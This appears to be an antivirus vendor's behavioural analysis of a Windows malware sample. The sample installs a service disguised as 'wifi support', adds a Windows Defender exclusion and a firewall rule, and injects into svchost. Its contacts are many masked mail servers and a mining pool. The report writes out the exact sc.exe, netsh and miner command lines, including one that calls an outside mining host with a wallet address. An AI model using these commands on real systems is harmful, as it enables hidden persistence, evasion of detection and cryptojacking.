Technical Information
To ensure autorun and distribution
Sets the following service settings
- [<HKLM>\System\CurrentControlSet\Services\vshpuhoj] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\vshpuhoj] 'ImagePath' = '%WINDIR%\SysWOW64\vshpuhoj\mcilsztg.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\vshpuhoj] 'ImagePath' = '%WINDIR%\SysWOW64\vshpuhoj\mcilsztg.exe'
Creates the following services
- 'vshpuhoj' %WINDIR%\SysWOW64\vshpuhoj\mcilsztg.exe /d"<Full path to file>"
- 'vshpuhoj' %WINDIR%\SysWOW64\vshpuhoj\mcilsztg.exe
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion with following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\vshpuhoj' = '00000000'
Executes the following
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Injects code into
the following system processes:
- %WINDIR%\syswow64\svchost.exe
Modifies file system
Creates the following files
- %TEMP%\mcilsztg.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
Moves the following files
- from %TEMP%\mcilsztg.exe to %WINDIR%\syswow64\vshpuhoj\mcilsztg.exe
Deletes itself.
Network activity
Connects to
- 'sv####lfheim.top':443
- 'mx#######902.gslb.pphosted.com':25
- 'ma##.##rshworld.co.uk':25
- 'mx#######003.gslb.pphosted.com':25
- 'ar##.#####matik.uni-oldenburg.de':25
- 'sm########.informatik.uni-frankfurt.de':25
- 'in#####cionsexual.com':25
- 'tw##ter.com':443
- 'ma###.icxt.com':25
- 'in####ationba.com':25
- 'ma###.#ailinator.com':25
- 'mx#######401.gslb.pphosted.com':25
- 'sm###.##mmunitymedical.org':25
- 'ap###.paypal.com':443
- 'mx#######901.gslb.pphosted.com':25
- 'se###.##.1.0001.arsmtp.com':25
- 'mx#######b02.gslb.pphosted.com':25
- 'ma##.#nterpow.net':25
- 'mx#######c04.gslb.pphosted.com':25
- 'mx#######402.gslb.pphosted.com':25
- '_d####.######1a4612.informationliberation.com':25
- 'mx#######502.gslb.pphosted.com':25
- 'mx#######402.gslb.gpphosted.com':25
- 'st#####net.mx.av-mx.com':25
- 'mx#######c01.gslb.pphosted.com':25
- 'mx###.comcast.net':25
- 'mx#######a01.gslb.pphosted.com':25
- 'google.com':443
- 'go###e.co.uk':443
- 'mx##.weil.com':25
- 'sm###.state.or.us':25
- 'mx#######e01.gslb.pphosted.com':25
- 'mx.##a.untd.com':25
- 'mx.##.###.cust.b.hostedemail.com':25
- 'mx##.#lackberry.com':25
- 'mx######91d01.pphosted.com':25
- 'fa###ool.xyz':10060
- 'mx####.#egamailservers.com':25
- 'al######x-vip2.prodigy.net':25
- 'mx###.##il.am0.yahoodns.net':25
- 'nm###.taeyeon.co.kr':25
- 'we#####.mef-cotentin.com':25
- 'mx##.##ndenserver.de':25
- 'mx.###business.at':25
- 'mx#######801.gslb.pphosted.com':25
- 'mx#######b01.gslb.pphosted.com':25
- 'sm###.#ail.medcity.net':25
- 'mx#######f01.gslb.pphosted.com':25
- 'mx.#p.pl':25
- 'mx#######501.gslb.pphosted.com':25
- 'aspmx.l.google.com':25
- 'mx##.###us-vadesecure.net':25
- 'dn#######stmx01.email.rr.com':25
- 'mx#######301.gslb.pphosted.com':25
- 'na#.###.#rotection.outlook.com':25
- 'mx#######001.gslb.pphosted.com':25
- 'mx####.##il.gm0.yahoodns.net':25
- 'mx#.#aver.com':25
- '17#.#13.115.158':481
- 'ma##.#isoft.info':25
- 'mx#######c03.gslb.pphosted.com':25
- 'ma###iggins.com':25
- '17#.#13.115.154':417
- 'mx.##rdiv.com':25
- 'mx#.#eznam.cz':25
- '52.##3.241.7':443
- 'mx#######d01.gslb.pphosted.com':25
- 'mx#.##ckeyecom.net':25
- 'ma##.#-email.net':25
- 'mx.####iciodecorreo.es':25
- 'mx##.mail.com':25
- 'mx#.#ate.com':25
- 'sm#####.hosting.orange.pl':25
- 'mx#######601.gslb.pphosted.com':25
- 'ff######x-vip2.prodigy.net':25
- 'google.com':80
- '17#.#13.115.157':417
- '17#.#13.115.156':417
- '80.#6.75.4':417
- '17#.#13.115.155':417
- '17#.#13.115.153':417
- 'in###gram.com':443
TCP
HTTP GET requests
- http://www.google.com/
Other
- 'sv####lfheim.top':443
- 'se###.##.1.0001.arsmtp.com':25
- 'ap###.paypal.com':443
- 'ma###.#ailinator.com':25
- 'al######x-vip2.prodigy.net':25
- 'ma##.#nterpow.net':25
- 'sm########.informatik.uni-frankfurt.de':25
- 'ar##.#####matik.uni-oldenburg.de':25
- '17#.#13.115.157':417
- 'ma##.##rshworld.co.uk':25
- 'fa###ool.xyz':10060
- 'go###e.co.uk':443
- 'google.com':443
- 'in#####cionsexual.com':25
- 'in####ationba.com':25
- 'st#####net.mx.av-mx.com':25
- 'mx#######301.gslb.pphosted.com':25
- 'mx###.##il.am0.yahoodns.net':25
- 'mx####.#egamailservers.com':25
- 'nm###.taeyeon.co.kr':25
- 'mx#.#eznam.cz':25
- '52.##3.241.7':443
- 'mx#.#aver.com':25
- 'na#.###.#rotection.outlook.com':25
- 'mx####.##il.gm0.yahoodns.net':25
- 'aspmx.l.google.com':25
- 'mx#######001.gslb.pphosted.com':25
- '17#.#13.115.153':417
- '80.#6.75.4':417
- '_d####.######1a4612.informationliberation.com':25
- 'mx#######402.gslb.pphosted.com':25
- '17#.#13.115.154':417
- '17#.#13.115.156':417
- 'ff######x-vip2.prodigy.net':25
- 'mx#.##ckeyecom.net':25
- 'ma##.#-email.net':25
- 'mx.####iciodecorreo.es':25
- 'mx#######d01.gslb.pphosted.com':25
- 'we#####.mef-cotentin.com':25
- '17#.#13.115.158':481
- '17#.#13.115.155':417
- 'ma##.#isoft.info':25
UDP
- DNS ASK sv####lfheim.top
- DNS ASK mx#######003.gslb.pphosted.com
- DNS ASK su###ust.com
- DNS ASK ma####orld.co.uk
- DNS ASK ma##.##rshworld.co.uk
- DNS ASK de##rme.com
- DNS ASK mx#######902.gslb.pphosted.com
- DNS ASK ar##.#####matik.uni-oldenburg.de
- DNS ASK we###fargo.com
- DNS ASK hc####lthcare.com
- DNS ASK in####ationba.com
- DNS ASK tc##ank.com
- DNS ASK mx#######402.gslb.pphosted.com
- DNS ASK un####salmccann.com
- DNS ASK mx#######c03.gslb.pphosted.com
- DNS ASK fa###ool.xyz
- DNS ASK ic##.com
- DNS ASK ma###.icxt.com
- DNS ASK in######ik.uni-oldenburg.de
- DNS ASK de##.com
- DNS ASK sm########.informatik.uni-frankfurt.de
- DNS ASK ap###.paypal.com
- DNS ASK sm###.##mmunitymedical.org
- DNS ASK un##a.com
- DNS ASK gr####leduff.com
- DNS ASK mx#######401.gslb.pphosted.com
- DNS ASK ma###nator.com
- DNS ASK ma###.#ailinator.com
- DNS ASK co#####tymedical.org
- DNS ASK be###outh.net
- DNS ASK fi#k.it
- DNS ASK de##esu.com
- DNS ASK ma##.#nterpow.net
- DNS ASK tw##ter.com
- DNS ASK th##ame.com
- DNS ASK in#####cionsexual.com
- DNS ASK in######ik.uni-frankfurt.de
- DNS ASK al######x-vip2.prodigy.net
- DNS ASK be###outh.com
- DNS ASK am###tech.net
- DNS ASK ma##.#isoft.info
- DNS ASK bl###berry.net
- DNS ASK da####ssavings.com
- DNS ASK in###dent.com
- DNS ASK mx#######c01.gslb.pphosted.com
- DNS ASK co#####sequipment.com
- DNS ASK st##el.net
- DNS ASK st#####net.mx.av-mx.com
- DNS ASK co##ast.net
- DNS ASK mx###.comcast.net
- DNS ASK ar#.com
- DNS ASK wa##gas.com
- DNS ASK mx#######502.gslb.pphosted.com
- DNS ASK in######ionliberation.com
- DNS ASK _d####.######1a4612.informationliberation.com
- DNS ASK in######iquepourtous.com
- DNS ASK in###mazione.it
- DNS ASK rw##ck.com
- DNS ASK mx#######402.gslb.gpphosted.com
- DNS ASK mx#######a01.gslb.pphosted.com
- DNS ASK ad##s12.org
- DNS ASK go###e.co.uk
- DNS ASK go.com
- DNS ASK mx.##.###.cust.b.hostedemail.com
- DNS ASK ne##ero.com
- DNS ASK mx.##a.untd.com
- DNS ASK at#.com
- DNS ASK je###ries.com
- DNS ASK mx#######e01.gslb.pphosted.com
- DNS ASK mx##.#lackberry.com
- DNS ASK vi##o.com
- DNS ASK ct##orp.com
- DNS ASK eu##pe.com
- DNS ASK hi###premix.com
- DNS ASK st##e.or.us
- DNS ASK sm###.state.or.us
- DNS ASK we##.com
- DNS ASK mx##.weil.com
- DNS ASK so#.org
- DNS ASK cn##.org
- DNS ASK mx######91d01.pphosted.com
- DNS ASK mx#######901.gslb.pphosted.com
- DNS ASK th####nreuters.com
- DNS ASK li####dbrands.com
- DNS ASK mx#######f01.gslb.pphosted.com
- DNS ASK ad###nic.com
- DNS ASK sm###.#ail.medcity.net
- DNS ASK am###trade.com
- DNS ASK do###est.com
- DNS ASK wp.pl
- DNS ASK mx.#p.pl
- DNS ASK mx#######b01.gslb.pphosted.com
- DNS ASK pr##rch.com
- DNS ASK mx.###business.at
- DNS ASK pw##iv.com
- DNS ASK mx.##rdiv.com
- DNS ASK ma###iggins.com
- DNS ASK ea###link.net
- DNS ASK ma###onitor.com
- DNS ASK mx#######801.gslb.pphosted.com
- DNS ASK wc###spital.org
- DNS ASK mx#######501.gslb.pphosted.com
- DNS ASK lv#h.fr
- DNS ASK mx#.#aver.com
- DNS ASK up#.com
- DNS ASK mx#######001.gslb.pphosted.com
- DNS ASK we##v.net
- DNS ASK na#.###.#rotection.outlook.com
- DNS ASK ve##zon.net
- DNS ASK mx####.##il.gm0.yahoodns.net
- DNS ASK na##r.com
- DNS ASK ef#.fr
- DNS ASK ho###on.rr.com
- DNS ASK dn#######stmx01.email.rr.com
- DNS ASK 23#.###.112.82.in-addr.arpa
- DNS ASK ac##v.org
- DNS ASK aspmx.l.google.com
- DNS ASK do######ndconsulting.com
- DNS ASK mx##.##ndenserver.de
- DNS ASK mx#######301.gslb.pphosted.com
- DNS ASK mx##.###us-vadesecure.net
- DNS ASK mx#######c04.gslb.pphosted.com
- DNS ASK se###.##.1.0001.arsmtp.com
- DNS ASK google.com
- DNS ASK nm###.taeyeon.co.kr
- DNS ASK se##am.cz
- DNS ASK mx#.#eznam.cz
- DNS ASK me####tentin.com
- DNS ASK we#####.mef-cotentin.com
- DNS ASK wh##fm.org
- DNS ASK mx#######d01.gslb.pphosted.com
- DNS ASK ta###on.co.kr
- DNS ASK ya##o.fr
- DNS ASK wo####akihito.com
- DNS ASK mx####.#egamailservers.com
- DNS ASK le##l.fr
- DNS ASK ww.#o.nz
- DNS ASK mx#######b02.gslb.pphosted.com
- DNS ASK se##d.ca
- DNS ASK mx###.##il.am0.yahoodns.net
- DNS ASK le####nseils.com
- DNS ASK me#.com
- DNS ASK nu##r.com
- DNS ASK mx#.##ckeyecom.net
- DNS ASK mx#######601.gslb.pphosted.com
- DNS ASK at#.net
- DNS ASK ff######x-vip2.prodigy.net
- DNS ASK or##ge.pl
- DNS ASK sm#####.hosting.orange.pl
- DNS ASK na##.com
- DNS ASK mx#.#ate.com
- DNS ASK me##er.com
- DNS ASK pe###epc.com
- DNS ASK mx##.mail.com
- DNS ASK ne###ape.net
- DNS ASK qu###castj.com
- DNS ASK mx.####iciodecorreo.es
- DNS ASK ti##jo.com
- DNS ASK ma##.#-email.net
- DNS ASK be#.net
- DNS ASK ma##.com
- DNS ASK cb##ve.com
- DNS ASK in###gram.com
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\vshpuhoj\mcilsztg.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\vshpuhoj\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\mcilsztg.exe" %WINDIR%\SysWOW64\vshpuhoj\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create vshpuhoj binPath= "%WINDIR%\SysWOW64\vshpuhoj\mcilsztg.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description vshpuhoj "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start vshpuhoj' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\vshpuhoj\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\mcilsztg.exe" %WINDIR%\SysWOW64\vshpuhoj\
- '%WINDIR%\syswow64\sc.exe' create vshpuhoj binPath= "%WINDIR%\SysWOW64\vshpuhoj\mcilsztg.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description vshpuhoj "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start vshpuhoj
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
